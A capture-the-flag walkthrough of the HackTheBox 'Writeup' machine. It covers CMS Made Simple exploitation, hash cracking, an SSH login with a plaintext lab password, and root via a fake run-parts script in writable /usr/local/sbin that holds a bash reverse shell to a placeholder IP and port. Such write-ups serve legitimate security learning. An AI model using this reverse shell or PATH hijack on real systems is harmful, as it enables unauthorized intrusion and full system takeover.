I’m an avid doer of hackthebox machines, and writeup seems like a great fit to be… written up!
First, let’s start off by doing a basic nmap scan of this machine to see what we can find!
After some enumeration, I found there’s a directory called /writeup, on there is three pages, and a clever hint about not being crafted with vim. It looks like it’s CMS Made Simple, and we do have a vulnerability! I wget this file to my kali box, run it with the target url of http://10.10.10.138/writeup/, and it spits out some lovely output to let me know the hashed password and salt:
It didn’t take long to crack this one, using a free online cracker and entering the hash will give you the password. Now, this is tricky, it’s not the web password — it’s the ssh user password! Let’s give it a shot.
ssh [email protected] # password raykayjay9
Here we have our user.txt file to own the user, bingo!
A basic check of writeable directories using find / -type d -writable 2>/dev/null reveals that /usr/local/sbin is writable for us, this is good news — but what is going to trigger it and is there a suid? At this point, I usually crack out some enumerators, but after searching the forum it appears there’s a better tool for the job, pspy64! On your kali box, download pspy64 and scp it to the remote machine.
Now you’ve wget and scp it over, make it executable and run it! Now, I noticed my path doesn’t have /usr/local/sbin/, which isn’t great… maybe the root does? Nope. It appears to be executing commands in /bin/…. yikes.
At this point I opened another terminal to see if I could do my enumerations, and spotted a goodie inside of the pspy64 output….
We’re actually executing run-parts on user login, and we set our path here as /usr/local/sbin… awesome! Let’s create a new run-parts… shall we? 🙂
#!/bin/bash bash -i >& /dev/tcp/IP_ADDRESS/PORT 0>&1
Now, make this executable and copy it to /usr/local/sbin/, and ssh into the user once more (once your local kali shell is up, of course!), and we have root terminal!
We’ve now rooted this machine! On to the next, shall we? 🙂